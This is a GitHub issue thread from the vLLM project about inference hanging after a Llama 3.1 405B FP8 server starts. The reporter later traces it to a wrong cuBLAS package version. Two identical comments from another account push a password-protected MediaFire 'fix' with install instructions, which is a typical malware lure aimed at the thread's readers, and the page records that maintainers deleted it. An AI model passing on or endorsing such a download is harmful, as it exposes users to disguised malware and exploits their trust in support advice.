[Bug]: After VLLM successfully starts the service, a prompt will appear during the first inference and the inference cannot proceed normally #7893

fu1996 · 2024-08-27T03:04:27Z

Your current environment

The output of `python3 -m vllm.entrypoints.openai.api_server --model /data0/models/405B-instruct-FP8 --swap-space 16 --tensor-parallel-size 8 --served-model-name llama-3.1-405B --host 0.0.0.0 --port 8081 --max-num-seqs 256 --enforce-eager`

INFO 08-27 10:47:25 logger.py:36] Received request cmpl-cbb8382b602e4d39b88f0c5f955da4f1-0: prompt: '你是谁？', params: SamplingParams(n=1, best_of=1, presence_penalty=0.0, frequency_penalty=0.0, repetition_penalty=1.0, temperature=0.0, top_p=1.0, top_k=-1, min_p=0.0, seed=None, use_beam_search=False, length_penalty=1.0, early_stopping=False, stop=[], stop_token_ids=[], include_stop_str_in_output=False, ignore_eos=False, max_tokens=100, min_tokens=0, logprobs=None, prompt_logprobs=None, skip_special_tokens=True, spaces_between_special_tokens=True, truncate_prompt_tokens=None), prompt_token_ids: [128000, 57668, 21043, 112471, 11571], lora_request: None, prompt_adapter_request: None.
INFO 08-27 10:47:25 async_llm_engine.py:174] Added request cmpl-cbb8382b602e4d39b88f0c5f955da4f1-0.
/root/miniconda3/envs/vllm-0.5.4/lib/python3.11/multiprocessing/resource_tracker.py:254: UserWarning: resource_tracker: There appear to be 1 leaked shared_memory objects to clean up at shutdown
  warnings.warn('resource_tracker: There appear to be %d '

🐛 Describe the bug

No code. Just starting the service

nvidia-smi result is

NVIDIA-SMI 535.161.07 Driver Version: 535.161.07 CUDA Version: 12.2

uname -a result is
Linux VM-0-16-centos 5.4.119-19.0009.28 #1 SMP Thu May 18 10:37:10 CST 2023 x86_64 x86_64 x86_64 GNU/Linux

linux version is H20

Before submitting a new issue...

Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the documentation page, which can answer lots of frequently asked questions.

The text was updated successfully, but these errors were encountered:

amir1387aht · 2024-08-27T03:05:38Z

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

amir1387aht · 2024-08-27T03:08:04Z

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

fu1996 · 2024-08-27T06:21:20Z

Solved, the underlying Nvidia-Cublabs-CU12 dependency is incorrect.
pip3 install nvidia-cublas-cu12==12.3.4.1 -i https://pypi.tuna.tsinghua.edu.cn/simple

allenz92 · 2024-11-15T06:25:46Z

Solved, the underlying Nvidia-Cublabs-CU12 dependency is incorrect. pip3 install nvidia-cublas-cu12==12.3.4.1 -i https://pypi.tuna.tsinghua.edu.cn/simple

Hi Fu, how did you find out about the version mismatch?

fu1996 added the bug Something isn't working label Aug 27, 2024

fu1996 closed this as completed Aug 27, 2024

vllm-project deleted a comment from amir1387aht Aug 27, 2024

github-staff deleted a comment from fu1996 Aug 27, 2024

github-staff deleted a comment from jeejeelee Aug 27, 2024

jiusi9 mentioned this issue Dec 5, 2024

H20显卡推理 glm9b-chat失败，版本0.16.3 xorbitsai/inference#2544

Closed

3 tasks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Bug]: After VLLM successfully starts the service, a prompt will appear during the first inference and the inference cannot proceed normally #7893

[Bug]: After VLLM successfully starts the service, a prompt will appear during the first inference and the inference cannot proceed normally #7893

fu1996 commented Aug 27, 2024

amir1387aht commented Aug 27, 2024

amir1387aht commented Aug 27, 2024

fu1996 commented Aug 27, 2024

allenz92 commented Nov 15, 2024

[Bug]: After VLLM successfully starts the service, a prompt will appear during the first inference and the inference cannot proceed normally #7893

[Bug]: After VLLM successfully starts the service, a prompt will appear during the first inference and the inference cannot proceed normally #7893

Comments

fu1996 commented Aug 27, 2024

Your current environment

🐛 Describe the bug

Before submitting a new issue...

amir1387aht commented Aug 27, 2024

amir1387aht commented Aug 27, 2024

fu1996 commented Aug 27, 2024

allenz92 commented Nov 15, 2024